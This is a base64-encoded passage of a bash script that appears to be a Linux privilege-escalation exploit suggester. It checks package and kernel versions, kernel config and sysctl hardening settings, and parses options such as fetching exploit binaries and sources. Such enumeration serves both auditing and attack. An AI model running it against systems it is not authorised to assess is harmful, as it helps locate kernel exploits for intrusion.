2ZXIxW2ldfSA+IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDEKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt2ZXIxW2ldfSA8IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDIKICAgICAgICBmaQogICAgZG9uZQoKICAgIHJldHVybiAwCn0KCmRvVmVyc2lvbkNvbXBhcmlzaW9uKCkgewogICAgbG9jYWwgcmVxVmVyc2lvbj0iJDEiCiAgICBsb2NhbCByZXFSZWxhdGlvbj0iJDIiCiAgICBsb2NhbCBjdXJyZW50VmVyc2lvbj0iJDMiCgogICAgdmVyQ29tcGFyaXNpb24gJGN1cnJlbnRWZXJzaW9uICRyZXFWZXJzaW9uCiAgICBjYXNlICQ/IGluCiAgICAgICAgMCkgY3VycmVudFJlbGF0aW9uPSc9Jzs7CiAgICAgICAgMSkgY3VycmVudFJlbGF0aW9uPSc+Jzs7CiAgICAgICAgMikgY3VycmVudFJlbGF0aW9uPSc8Jzs7CiAgICBlc2FjCgogICAgaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPSIgXTsgdGhlbgogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPSIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkcmVxUmVsYXRpb24iID09ICI+IiBdOyB0aGVuCiAgICAgICAgWyAkY3VycmVudFJlbGF0aW9uID09ICI+IiBdICYmIHJldHVybiAwCiAgICBlbGlmIFsgIiRyZXFSZWxhdGlvbiIgPT0gIjwiIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPj0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj4iIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPD0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCn0KCmNvbXBhcmVWYWx1ZXMoKSB7CiAgICBjdXJWYWw9JDEKICAgIHZhbD0kMgogICAgc2lnbj0kMwoKICAgIGlmIFsgIiRzaWduIiA9PSAiPT0iIF07IHRoZW4KICAgICAgICBbICIkdmFsIiA9PSAiJGN1clZhbCIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkc2lnbiIgPT0gIiE9IiBdOyB0aGVuCiAgICAgICAgWyAiJHZhbCIgIT0gIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCgogICAgcmV0dXJuIDEKfQoKY2hlY2tSZXF1aXJlbWVudCgpIHsKICAgICNlY2hvICJDaGVja2luZyByZXF1aXJlbWVudDogJDEiCiAgICBsb2NhbCBJTj0iJDEiCiAgICBsb2NhbCBwa2dOYW1lPSIkezI6NH0iCgogICAgaWYgW1sgIiRJTiIgPX4gXnBrZz0uKiQgXV07IHRoZW4KCiAgICAgICAgIyBhbHdheXMgdHJ1ZSBmb3IgTGludXggT1MKICAgICAgICBbICR7cGtnTmFtZX0gPT0gImxpbnV4LWtlcm5lbCIgXSAmJiByZXR1cm4gMAoKICAgICAgICAjIHZlcmlmeSBpZiBwYWNrYWdlIGlzIHByZXNlbnQgCiAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKICAgICAgICBpZiBbIC1uICIkcGtnIiBdOyB0aGVuCiAgICAgICAgICAgIHJldHVybiAwCiAgICAgICAgZmkKCiAgICBlbGlmIFtbICIkSU4iID1+IF52ZXIuKiQgXV07IHRoZW4KICAgICAgICB2ZXJzaW9uPSIke0lOLy9bXjAtOS5dL30iCiAgICAgICAgcmVzdD0iJHtJTiN2ZXJ9IgogICAgICAgIG9wZXJhdG9yPSR7cmVzdCUkdmVyc2lvbn0KCiAgICAgICAgaWYgWyAiJHBrZ05hbWUiID09ICJsaW51eC1rZXJuZWwiIC1vICIkb3B0X2NoZWNrc2VjX21vZGUiID09ICJ0cnVlIiBdOyB0aGVuCgogICAgICAgICAgICAjIGZvciAtLWN2ZWxpc3QtZmlsZSBtb2RlIHNraXAga2VybmVsIHZlcnNpb24gY29tcGFyaXNpb24KICAgICAgICAgICAgWyAiJG9wdF9jdmVsaXN0X2ZpbGUiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgIGRvVmVyc2lvbkNvbXBhcmlzaW9uICR2ZXJzaW9uICRvcGVyYXRvciAkS0VSTkVMICYmIHJldHVybiAwCiAgICAgICAgZWxzZQogICAgICAgICAgICAjIGV4dHJhY3QgcGFja2FnZSB2ZXJzaW9uIGFuZCBjaGVjayBpZiByZXF1aXJlbW50IGlzIHRydWUKICAgICAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKCiAgICAgICAgICAgICMgc2tpcCAoaWYgcnVuIHdpdGggLS1za2lwLXBrZy12ZXJzaW9ucykgdmVyc2lvbiBjaGVja2luZyBpZiBwYWNrYWdlIHdpdGggZ2l2ZW4gbmFtZSBpcyBpbnN0YWxsZWQKICAgICAgICAgICAgWyAiJG9wdF9za2lwX3BrZ192ZXJzaW9ucyIgPSAidHJ1ZSIgLWEgLW4gIiRwa2ciIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgICMgdmVyc2lvbmluZzoKICAgICAgICAgICAgI2VjaG8gInBrZzogJHBrZyIKICAgICAgICAgICAgcGtnVmVyc2lvbj0kKGVjaG8gIiRwa2ciIHwgZ3JlcCAtRSAtaSAtbyAtZSAnLVtcLjAtOVwrOnBdK1stXCtdJyB8IGN1dCAtZCc6JyAtZjIgfCBzZWQgJ3MvW1wrLV0vL2cnIHwgc2VkICdzL3BbMC05XS8vZycpCiAgICAgICAgICAgICNlY2hvICJ2ZXJzaW9uOiAkcGtnVmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8gIm9wZXJhdG9yOiAkb3BlcmF0b3IiCiAgICAgICAgICAgICNlY2hvICJyZXF1aXJlZCB2ZXJzaW9uOiAkdmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8KICAgICAgICAgICAgZG9WZXJzaW9uQ29tcGFyaXNpb24gJHZlcnNpb24gJG9wZXJhdG9yICRwa2dWZXJzaW9uICYmIHJldHVybiAwCiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXng4Nl82NCQgXV0gJiYgWyAiJEFSQ0giID09ICJ4ODZfNjQiIC1vICIkQVJDSCIgPT0gIiIgXTsgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBlbGlmIFtbICIkSU4iID1+IF54ODYkIF1dICYmIFsgIiRBUkNIIiA9PSAiaTM4NiIgLW8gIiRBUkNIIiA9PSAiaTY4NiIgLW8gIiRBUkNIIiA9PSAiIiBdOyB0aGVuCiAgICAgICAgcmV0dXJuIDAKICAgIGVsaWYgW1sgIiRJTiIgPX4gXkNPTkZJR18uKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIHNldCkgb3IgaWYgdXNlciBzYWlkIHNvICgtLXNraXAtbW9yZS1jaGVja3MpCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJ0cnVlIiBdICYmIHJldHVybiAwCgogICAgICAgICMgaWYga2VybmVsIGNvbmZpZyBJUyBhdmFpbGFibGU6CiAgICAgICAgaWYgWyAtbiAiJEtDT05GSUciIF07IHRoZW4KICAgICAgICAgICAgaWYgJEtDT05GSUcgfCBncmVwIC1FIC1xaSAkSU47IHRoZW4KICAgICAgICAgICAgICAgIHJldHVybiAwOwogICAgICAgICAgICAjIHJlcXVpcmVkIG9wdGlvbiB3YXNuJ3QgZm91bmQsIGV4cGxvaXQgaXMgbm90IGFwcGxpY2FibGUKICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgcmV0dXJuIDE7CiAgICAgICAgICAgIGZpCiAgICAgICAgIyBjb25maWcgaXMgbm90IGF2YWlsYWJsZQogICAgICAgIGVsc2UKICAgICAgICAgICAgcmV0dXJuIDA7CiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXnN5c2N0bDouKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIG1vZGVzKSBvciBpZiB1c2VyIHNhaWQgc28gKC0tc2tpcC1tb3JlLWNoZWNrcykKICAgICAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgc3lzY3RsQ29uZGl0aW9uPSIke0lOOjd9IgoKICAgICAgICAjIGV4dHJhY3Qgc3lzY3RsIGVudHJ5LCByZWxhdGlvbiBzaWduIGFuZCByZXF1aXJlZCB2YWx1ZQogICAgICAgIGlmIGVjaG8gJHN5c2N0bENvbmRpdGlvbiB8IGdyZXAgLXFpICIhPSI7IHRoZW4KICAgICAgICAgICAgc2lnbj0iIT0iCiAgICAgICAgZWxpZiBlY2hvICRzeXNjdGxDb25kaXRpb24gfCBncmVwIC1xaSAiPT0iOyB0aGVuCiAgICAgICAgICAgIHNpZ249Ij09IgogICAgICAgIGVsc2UKICAgICAgICAgICAgZXhpdFdpdGhFcnJNc2cgIldyb25nIHN5c2N0bCBjb25kaXRpb24uIFRoZXJlIGlzIHN5bnRheCBlcnJvciBpbiB5b3VyIGZlYXR1cmVzIERCLiBBYm9ydGluZy4iCiAgICAgICAgZmkKICAgICAgICB2YWw9JChlY2hvICIkc3lzY3RsQ29uZGl0aW9uIiB8IGF3ayAtRiAiJHNpZ24iICd7cHJpbnQgJDJ9JykKICAgICAgICBlbnRyeT0kKGVjaG8gIiRzeXNjdGxDb25kaXRpb24iIHwgYXdrIC1GICIkc2lnbiIgJ3twcmludCAkMX0nKQoKICAgICAgICAjIGdldCBjdXJyZW50IHNldHRpbmcgb2Ygc3lzY3RsIGVudHJ5CiAgICAgICAgY3VyVmFsPSQoL3NiaW4vc3lzY3RsIC1hIDI+IC9kZXYvbnVsbCB8IGdyZXAgIiRlbnRyeSIgfCBhd2sgLUYnPScgJ3twcmludCAkMn0nKQoKICAgICAgICAjIHNwZWNpYWwgY2FzZSBmb3IgLS1jaGVja3NlYyBtb2RlOiByZXR1cm4gMiBpZiB0aGVyZSBpcyBubyBzdWNoIHN3aXRjaCBpbiBzeXNjdGwKICAgICAgICBbIC16ICIkY3VyVmFsIiAtYSAiJG9wdF9jaGVja3NlY19tb2RlIiA9ICJ0cnVlIiBdICYmIHJldHVybiAyCgogICAgICAgICMgZm9yIG90aGVyIG1vZGVzOiBza2lwIGlmIHRoZXJlIGlzIG5vIHN1Y2ggc3dpdGNoIGluIHN5c2N0bAogICAgICAgIFsgLXogIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgIyBjb21wYXJlICYgcmV0dXJuIHJlc3VsdAogICAgICAgIGNvbXBhcmVWYWx1ZXMgJGN1clZhbCAkdmFsICRzaWduICYmIHJldHVybiAwCgogICAgZWxpZiBbWyAiJElOIiA9fiBeY21kOi4qJCBdXTsgdGhlbgoKICAgICAgICAjIHNraXAgaWYgY2hlY2sgaXMgbm90IGFwcGxpY2FibGUgKC1rIG9yIC0tdW5hbWUgb3IgLXAgbW9kZXMpIG9yIGlmIHVzZXIgc2FpZCBzbyAoLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgIFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAidHJ1ZSIgXSAmJiByZXR1cm4gMAoKICAgICAgICBjbWQ9IiR7SU46NH0iCiAgICAgICAgaWYgZXZhbCAiJHtjbWR9IjsgdGhlbgogICAgICAgICAgICByZXR1cm4gMAogICAgICAgIGZpCiAgICBmaQoKICAgIHJldHVybiAxCn0KCmdldEtlcm5lbENvbmZpZygpIHsKCiAgICBpZiBbIC1mIC9wcm9jL2NvbmZpZy5neiBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9InpjYXQgL3Byb2MvY29uZmlnLmd6IgogICAgZWxpZiBbIC1mIC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIF0gOyB0aGVuCiAgICAgICAgS0NPTkZJRz0iY2F0IC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIgogICAgZWxpZiBbIC1mICIke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fSIvLmNvbmZpZyBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9ImNhdCAke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fS8uY29uZmlnIgogICAgZWxzZQogICAgICAgIEtDT05GSUc9IiIKICAgIGZpCn0KCmNoZWNrc2VjTW9kZSgpIHsKCiAgICBNT0RFPTAKCiAgICAjIHN0YXJ0IGFuYWx5c2lzCmZvciBGRUFUVVJFIGluICIke0ZFQVRVUkVTW0BdfSI7IGRvCgogICAgIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRkVBVFVSRSIKCgkjIG1vZGVzOiBrZXJuZWwtZmVhdHVyZSAoMSkgfCBody1mZWF0dXJlICgyKSB8IDNyZHBhcnR5LWZlYXR1cmUgKDMpIHwgYXR0YWNrLXN1cmZhY2UgKDQpCiAgICBOQU1FPSIke2FyclswXX0iCiAgICBQUkVfTkFNRT0iJHtOQU1FOjA6OH0iCiAgICBOQU1FPSIke05BTUU6OX0iCiAgICBpZiBbICIke1BSRV9OQU1FfSIgPSAic2VjdGlvbjoiIF07IHRoZW4KCQkjIGFkdmFuY2UgdG8gbmV4dCBNT0RFCgkJTU9ERT0kKCgkTU9ERSArIDEpKQoKICAgICAgICBlY2hvCiAgICAgICAgZWNobyAtZSAiJHtibGR3aHR9JHtOQU1FfSR7dHh0cnN0fSIKICAgICAgICBlY2hvCiAgICAgICAgY29udGludWUKICAgIGZpCgogICAgQVZBSUxBQkxFPSIke2FyclsxXX0iICYmIEFWQUlMQUJMRT0iJHtBVkFJTEFCTEU6MTF9IgogICAgRU5BQkxFPSQoZWNobyAiJEZFQVRVUkUiIHwgZ3JlcCAiZW5hYmxlZDogIiB8IGF3ayAtRidlZDogJyAne3ByaW50ICQyfScpCiAgICBhbmFseXNpc191cmw9JChlY2hvICIkRkVBVFVSRSIgfCBncmVwICJhbmFseXNpcy11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGF2YWlsYWJpbGl0eSByZXF1aXJlbWVudHMgJiBsb29wIHRocnUgYWxsIGF2YWlsYWJpbGl0eSByZXFzIG9uZSBieSBvbmUgJiBjaGVjayB3aGV0aGVyIGl0IGlzIG1ldAogICAgSUZTPScsJyByZWFkIC1yIC1hIGFycmF5IDw8PCAiJEFWQUlMQUJMRSIKICAgIEFWQUlMQUJMRV9SRVFTX05VTT0keyNhcnJheVtAXX0KICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPTAKCUNPTkZJRz0iIgogICAgZm9yIFJFUSBpbiAiJHthcnJheVtAXX0iOyBkbwoKCQkjIGZpbmQgQ09ORklHXyBuYW1lIChpZiBwcmVzZW50KSBmb3IgY3VycmVudCBmZWF0dXJlIChvbmx5IGZvciBkaXNwbGF5IHB1cnBvc2VzKQoJCWlmIFsgLXogIiRDT05GSUciIF07IHRoZW4KCQkJY29uZmlnPSQoZWNobyAiJFJFUSIgfCBncmVwICJDT05GSUdfIikKCQkJWyAtbiAiJGNvbmZpZyIgXSAmJiBDT05GSUc9IigkKGVjaG8gJFJFUSB8IGN1dCAtZCc9JyAtZjEpKSIKCQlmaQoKICAgICAgICBpZiAoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpOyB0aGVuCiAgICAgICAgICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPSQoKCRBVkFJTEFCTEVfUEFTU0VEX1JFUSArIDEpKQogICAgICAgIGVsc2UKICAgICAgICAgICAgYnJlYWsKICAgICAgICBmaQogICAgZG9uZQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGVuYWJsZW1lbnQgcmVxdWlyZW1lbnRzICYgbG9vcCB0aHJ1IGFsbCBlbmFibGVtZW50IHJlcXMgb25lIGJ5IG9uZSAmIGNoZWNrIHdoZXRoZXIgaXQgaXMgbWV0CiAgICBFTkFCTEVfUEFTU0VEX1JFUT0wCiAgICBFTkFCTEVfUkVRU19OVU09MAogICAgbm9TeXNjdGw9MAogICAgaWYgWyAtbiAiJEVOQUJMRSIgXTsgdGhlbgogICAgICAgIElGUz0nLCcgcmVhZCAtciAtYSBhcnJheSA8PDwgIiRFTkFCTEUiCiAgICAgICAgRU5BQkxFX1JFUVNfTlVNPSR7I2FycmF5W0BdfQogICAgICAgIGZvciBSRVEgaW4gIiR7YXJyYXlbQF19IjsgZG8KICAgICAgICAgICAgY21kU3Rkb3V0PSQoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpCiAgICAgICAgICAgIHJldFZhbD0kPwogICAgICAgICAgICBpZiBbICRyZXRWYWwgLWVxIDAgXTsgdGhlbgogICAgICAgICAgICAgICAgRU5BQkxFX1BBU1NFRF9SRVE9JCgoJEVOQUJMRV9QQVNTRURfUkVRICsgMSkpCiAgICAgICAgICAgIGVsaWYgWyAkcmV0VmFsIC1lcSAyIF07IHRoZW4KICAgICAgICAgICAgIyBzcGVjaWFsIGNhc2U6IHN5c2N0bCBlbnRyeSBpcyBub3QgcHJlc2VudCBvbiBnaXZlbiBzeXN0ZW06IHNpZ25hbCBpdCBhczogTi9BCiAgICAgICAgICAgICAgICBub1N5c2N0bD0xCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBmaQogICAgICAgIGRvbmUKICAgIGZpCgogICAgZmVhdHVyZT0kKGVjaG8gIiRGRUFUVVJFIiB8IGdyZXAgImZlYXR1cmU6ICIgfCBjdXQgLWQnICcgLWYgMi0pCgoJaWYgWyAtbiAiJGNtZFN0ZG91dCIgXTsgdGhlbgogICAgICAgIGlmIFsgIiRjbWRTdGRvdXQiIC1lcSAwIF07IHRoZW4KICAgICAgICAgICAgc3RhdGU9IlsgJHt0eHRyZWR9U2V0IHRvICRjbWRTdGRvdXQke3R4dHJzdH0gXSIKCQkJY21kU3Rkb3V0PSIiCiAgICAgICAgZWxzZQogICAgICAgICAgICBzdGF0ZT0iWyAke3R4dGdybn1TZXQgdG8gJGNtZFN0ZG91dCR7dHh0cnN0fSBdIgoJCQljbWRTdGRvdXQ9IiIKICAgICAgICBmaQogICAgZWxzZQoKCXVua25vd249IlsgJHt0eHRncmF5fVVua25vd24ke3R4dHJzdH0gIF0iCgoJIyBmb3IgM3JkIHBhcnR5ICgzKSBtb2RlIGRpc3BsYXkgIk4vQSIgb3IgIkVuYWJsZWQiCglpZiBbICRNT0RFIC1lcSAzIF07IHRoZW4KICAgICAgICBlbmFibGVkPSJbICR7dHh0Z3JufUVuYWJsZWQke3R4dHJzdH0gICBdIgogICAgICAgIGRpc2FibGVkPSJbICAgJHt0eHRncmF5fU4vQSR7dHh0cnN0fSAgICBdIgoKICAgICMgZm9yIGF0dGFjay1zdXJmYWNlICg0KSBtb2RlIGRpc3BsYXkgIkxvY2tlZCIgb3IgIkV4cG9zZWQiCiAgICBlbGlmIFsgJE1PREUgLWVxIDQgXTsgdGhlbgogICAgICAgZW5hYmxlZD0iWyAke3R4dHJlZH1FeHBvc2VkJHt0eHRyc3R9ICBdIgogICAgICAgZGlzYWJsZWQ9IlsgJHt0eHRncm59TG9ja2VkJHt0eHRyc3R9ICAgXSIKCgkjb3RoZXIgbW9kZXMiICJEaXNhYmxlZCIgLyAiRW5hYmxlZCIKCWVsc2UKCQllbmFibGVkPSJbICR7dHh0Z3JufUVuYWJsZWQke3R4dHJzdH0gIF0iCgkJZGlzYWJsZWQ9IlsgJHt0eHRyZWR9RGlzYWJsZWQke3R4dHJzdH0gXSIKCWZpCgoJaWYgWyAteiAiJEtDT05GSUciIC1hICIkRU5BQkxFX1JFUVNfTlVNIiA9IDAgXTsgdGhlbgoJICAgIHN0YXRlPSR1bmtub3duCiAgICBlbGlmIFsgJEFWQUlMQUJMRV9QQVNTRURfUkVRIC1lcSAkQVZBSUxBQkxFX1JFUVNfTlVNIC1hICRFTkFCTEVfUEFTU0VEX1JFUSAtZXEgJEVOQUJMRV9SRVFTX05VTSBdOyB0aGVuCiAgICAgICAgc3RhdGU9JGVuYWJsZWQKICAgIGVsc2UKICAgICAgICBzdGF0ZT0kZGlzYWJsZWQKCWZpCgogICAgZmkKCiAgICBlY2hvIC1lICIgJHN0YXRlICRmZWF0dXJlICR7d2h0fSR7Q09ORklHfSR7dHh0cnN0fSIKICAgIFsgLW4gIiRhbmFseXNpc191cmwiIF0gJiYgZWNobyAtZSAiICAgICAgICAgICAgICAkYW5hbHlzaXNfdXJsIgogICAgZWNobwoKZG9uZQoKfQoKZGlzcGxheUV4cG9zdXJlKCkgewogICAgUkFOSz0kMQoKICAgIGlmIFsgIiRSQU5LIiAtZ2UgNiBdOyB0aGVuCiAgICAgICAgZWNobyAiaGlnaGx5IHByb2JhYmxlIgogICAgZWxpZiBbICIkUkFOSyIgLWdlIDMgXTsgdGhlbgogICAgICAgIGVjaG8gInByb2JhYmxlIgogICAgZWxzZQogICAgICAgIGVjaG8gImxlc3MgcHJvYmFibGUiCiAgICBmaQp9CgojIHBhcnNlIGNvbW1hbmQgbGluZSBwYXJhbWV0ZXJzCkFSR1M9JChnZXRvcHQgLS1vcHRpb25zICRTSE9SVE9QVFMgIC0tbG9uZ29wdGlvbnMgJExPTkdPUFRTIC0tICIkQCIpClsgJD8gIT0gMCBdICYmIGV4aXRXaXRoRXJyTXNnICJBYm9ydGluZy4iCgpldmFsIHNldCAtLSAiJEFSR1MiCgp3aGlsZSB0cnVlOyBkbwogICAgY2FzZSAiJDEiIGluCiAgICAgICAgLXV8LS11bmFtZSkKICAgICAgICAgICAgc2hpZnQKICAgICAgICAgICAgVU5BTUVfQT0iJDEiCiAgICAgICAgICAgIG9wdF91bmFtZV9zdHJpbmc9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1WfC0tdmVyc2lvbikKICAgICAgICAgICAgdmVyc2lvbgogICAgICAgICAgICBleGl0IDAKICAgICAgICAgICAgOzsKICAgICAgICAtaHwtLWhlbHApCiAgICAgICAgICAgIHVzYWdlIAogICAgICAgICAgICBleGl0IDAKICAgICAgICAgICAgOzsKICAgICAgICAtZnwtLWZ1bGwpCiAgICAgICAgICAgIG9wdF9mdWxsPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtZ3wtLXNob3J0KQogICAgICAgICAgICBvcHRfc3VtbWFyeT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLWJ8LS1mZXRjaC1iaW5hcmllcykKICAgICAgICAgICAgb3B0X2ZldGNoX2JpbnM9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1zfC0tZmV0Y2gtc291cmNlcykKICAgICAgICAgICAgb3B0X2ZldGNoX3NyY3M9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1rfC0ta2VybmVsKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBLRVJORUw9IiQxIgogICAgICAgICAgICBvcHRfa2VybmVsX3ZlcnNpb249dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1kfC0tc2hvdy1kb3MpCiAgICAgICAgICAgIG9wdF9zaG93X2Rvcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLXB8LS1wa2dsaXN0LWZpbGUpCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIFBLR0xJU1RfRklMRT0iJDEiCiAgICAgICAgICAgIG9wdF9wa2dsaXN0X2ZpbGU9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tY3ZlbGlzdC1maWxlKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBDVkVMSVNUX0ZJTEU9IiQxIgogICAgICAgICAgICBvcHRfY3ZlbGlzdF9maWxlPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLWNoZWNrc2VjKQogICAgICAgICAgICBvcHRfY2hlY2tzZWNfbW9kZT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1rZXJuZWxzcGFjZS1vbmx5KQogICAgICAgICAgICBvcHRfa2VybmVsX29ubHk9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tdXNlcnNwYWNlLW9ubHkpCiAgICAgICAgICAgIG9wdF91c2Vyc3BhY2Vfb25seT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgICAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1za2lwLXBrZy12ZXJzaW9ucykKICAgICAgICAgICAgb3B0X3NraXBfcGtnX3ZlcnNpb25zPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAqKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBpZiBbICIkIyIgIT0gIjAiIF07IHRoZW4KICAgICAgICAgICAgICAgIGV4aXRXaXRoRXJyTXNnICJVbmtub3duIG9wdGlvbiAnJDEnLiBBYm9ydGluZy4iCiAgICAgICAgICAgIGZpCiAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIDs7CiAgICBlc2FjCiAgICBzaGlmdApkb25lCgojIGNoZWNrIEJhc2ggdmVyc2lvbiAoYXNzb2NpYXRpdmUgYXJyYXlzIG5lZWQgQmFzaCBpbiB2ZXJzaW9uIDQuMCspCmlmICgoQkFTSF9WRVJTSU5GT1swXSA8IDQpKTsgdGhlbgogICAgZXhpdFdpdGhFcnJNc2cgIlNjcmlwdCBuZWVkcyBCYXNoIGluIHZlcnNpb24gNC4wIG9yIG5ld2VyLiBBYm9ydGluZy4iCmZpCgojIGV4aXQgaWYgYm90aCAtLWtlcm5lbCBhbmQgLS11bmFtZSBhcmUgc2V0ClsgIiRvcHRfa2VybmVsX3ZlcnNpb24iID0gInRydWUiIF0gJiYgWyAkb3B0X3VuYW1lX3N0cmluZyA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAta3wtLWtlcm5lbCBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCgojIGV4aXQgaWYgYm90aCAtLWZ1bGwgYW5kIC0tc2hvcnQgYXJlIHNldApbICIkb3B0X2Z1bGwiID0gInRydWUiIF0gJiYgWyAkb3B0X3N1bW1hcnkgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWZ8LS1mdWxsIGFuZCAtZ3wtLXNob3J0IGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKCiMgLS1jdmVsaXN0LWZpbGUgbW9kZSBpcyBzdGFuZGFsb25lIG1vZGUgYW5kIGlzIG5vdCBhcHBsaWNhYmxlIHdoZW4gb25lIG9mIC1rIHwgLXUgfCAtcCB8IC0tY2hlY2tzZWMgc3dpdGNoZXMgYXJlIHNldAppZiBbICIkb3B0X2N2ZWxpc3RfZmlsZSIgPSAidHJ1ZSIgXTsgdGhlbgogICAgWyAhIC1lICIkQ1ZFTElTVF9GSUxFIiBdICYmIGV4aXRXaXRoRXJyTXNnICJQcm92aWRlZCBDVkUgbGlzdCBmaWxlIGRvZXMgbm90IGV4aXN0cy4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWt8LS1rZXJuZWwgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAtLWN2ZWxpc3QtZmlsZSBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCiAgICBbICIkb3B0X3BrZ2xpc3RfZmlsZSIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3d